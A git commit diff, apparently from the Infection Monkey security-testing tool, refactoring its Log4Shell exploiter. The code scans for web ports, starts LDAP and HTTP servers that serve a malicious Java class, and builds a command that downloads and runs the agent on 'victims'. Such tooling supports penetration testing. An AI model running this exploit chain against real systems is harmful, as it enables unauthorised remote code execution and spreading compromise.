Agent: Refactor Log4ShellExploiter to work with Puppet

2022-03-02 14:23:34 -05:00 · 2022-03-02 14:23:34 -05:00 · 031cafbe12
parent 7e957e5310
commit 031cafbe12
1 changed files with 26 additions and 32 deletions
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@ -13,18 +13,13 @@ from infection_monkey.exploit.log4shell_utils import (
 from infection_monkey.exploit.tools.helpers import get_monkey_depth
 from infection_monkey.exploit.tools.http_tools import HTTPTools
 from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.i_puppet.i_puppet import ExploiterResultData
 from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
-from infection_monkey.model import (
-    DROPPER_ARG,
-    LOG4SHELL_LINUX_COMMAND,
-    LOG4SHELL_WINDOWS_COMMAND,
-    VictimHost,
-)
+from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
 from infection_monkey.network.info import get_free_tcp_port
 from infection_monkey.network.tools import get_interface_to_target
 from infection_monkey.utils.commands import build_monkey_commandline
 from infection_monkey.utils.monkey_dir import get_monkey_dir_path
-from monkey.infection_monkey.i_puppet.i_puppet import ExploiterResultData

 logger = logging.getLogger(__name__)

@ -38,9 +33,24 @@ class Log4ShellExploiter(WebRCE):
        5  # Max time agent will wait for the response from victim in SECONDS
    )

-    def __init__(self, host: VictimHost):
-        super().__init__(host)
+    def _exploit_host(self) -> ExploiterResultData:
+        self._open_ports = [
+            int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
+        ]

+        if not self._open_ports:
+            logger.info("Could not find any open web ports to exploit")
+            return self.exploit_result
+
+        self._configure_servers()
+        self._start_servers()
+        try:
+            self.exploit(None, None)
+            return self.exploit_result
+        finally:
+            self._stop_servers()
+
+    def _configure_servers(self):
        self._ldap_port = get_free_tcp_port()

        self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
@ -49,29 +59,15 @@ class Log4ShellExploiter(WebRCE):
        self._ldap_server = None
        self._exploit_class_http_server = None
        self._agent_http_server_thread = None
-        self._open_ports = [
-            int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
-        ]
-
-    def _exploit_host(self) -> ExploiterResultData:
-        if not self._open_ports:
-            logger.info("Could not find any open web ports to exploit")
-            return self.exploit_result
-
-        self._start_servers()
-        try:
-            self.exploit(None, None)
-            return self.exploit_result
-        finally:
-            self._stop_servers()

    def _start_servers(self):
+        dropper_target_path = self.monkey_target_paths[self.host.os["type"]]
+
        # Start http server, to serve agent to victims
-        paths = self.get_monkey_paths()
-        agent_http_path = self._start_agent_http_server(paths)
+        agent_http_path = self._start_agent_http_server(dropper_target_path)

        # Build agent execution command
-        command = self._build_command(paths["dest_path"], agent_http_path)
+        command = self._build_command(dropper_target_path, agent_http_path)

        # Start http server to serve malicious java class to victim
        self._start_class_http_server(command)
@ -79,10 +75,10 @@ class Log4ShellExploiter(WebRCE):
        # Start ldap server to redirect ldap query to java class server
        self._start_ldap_server()

-    def _start_agent_http_server(self, agent_paths: dict) -> str:
+    def _start_agent_http_server(self, dropper_target_path) -> str:
        # Create server for http download and wait for it's startup.
        http_path, http_thread = HTTPTools.try_create_locked_transfer(
-            self.host, agent_paths["src_path"]
+            self.host, dropper_target_path, self.agent_repository
        )
        self._agent_http_server_thread = http_thread
        return http_path
@ -118,9 +114,7 @@ class Log4ShellExploiter(WebRCE):

    def _build_command(self, path, http_path) -> str:
        # Build command to execute
-        monkey_cmd = build_monkey_commandline(
-            self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
-        )
+        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, location=path)
        if "linux" in self.host.os["type"]:
            base_command = LOG4SHELL_LINUX_COMMAND
        else: